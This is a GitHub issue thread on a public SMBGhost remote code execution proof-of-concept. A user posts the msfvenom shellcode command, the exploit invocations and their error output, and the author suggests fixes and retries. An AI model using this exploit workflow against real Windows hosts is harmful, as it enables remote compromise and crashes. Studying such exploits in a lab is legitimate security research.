chompie1337 / SMBGhost_RCE_PoC

1.31k stars, 346 forks

Unable to unpack HalpApicRequestInterrupt #5

Closed 0xShkk closed 4 years ago

0xShkk commented 4 years ago

Hi, thank you for sharing your work!

So far, I was not able to reproduce the PoC.

Got it running against Windows 10 Enterprise 1909 x64 (Build 18363.418). Confirmed the system is vulnerable and SMB is reachable and open from the attacker system.

Replaced user payload with simple msfvenom shellcode like: msfvenom -p windows/x64/exec CMD='calc.exe' -f c

Unfortunately the first run got me this output:

python3 exploit.py -ip 192.168.100.51
[+] found low stub at phys addr 13000!
[+] PML4 at 1aa000
[+] base of HAL heap at fffff7adc0000000
[+] found PML4 self-ref entry 1e8
[+] found HalpInterruptController at fffff7adc00015a0
Traceback (most recent call last):
  File "exploit.py", line 448, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 411, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 339, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes

The second run gave me this one:

python3 exploit.py -ip 192.168.100.51
[-] physical read primitive failed!

And a third run this:

python3 exploit.py -ip 192.168.100.51
[+] found low stub at phys addr 13000!
[+] PML4 at 1aa000
[+] base of HAL heap at fffff7adc0000000
[+] found PML4 self-ref entry 1e8
Traceback (most recent call last):
  File "exploit.py", line 448, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 411, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 307, in search_hal_heap
    phys_addr = get_phys_addr(ip, port, index)
  File "exploit.py", line 244, in get_phys_addr
    pte_buff = read_physmem_primitive(ip, port, pte)
  File "exploit.py", line 188, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 203, in try_read_physmem_primitive
    buff = sock.recv(1000)
socket.timeout: timed out

Seems like the service crashed after the first run?

But why was HalpApicRequestInterrupt found in the first run but then contained more than 8 bytes? Or did I get the first error wrong?

Any ideas?

chompie1337 commented 4 years ago

Hi, this is a bug. I just pushed a fix.

In your last two runs it just seems to have timed out, as this sometimes happens with the read primitive. If you get a timeout error, try running again. If another error occurs, let me know.

0xShkk commented 4 years ago

Unfortunately I get only bluescreens after the fix :/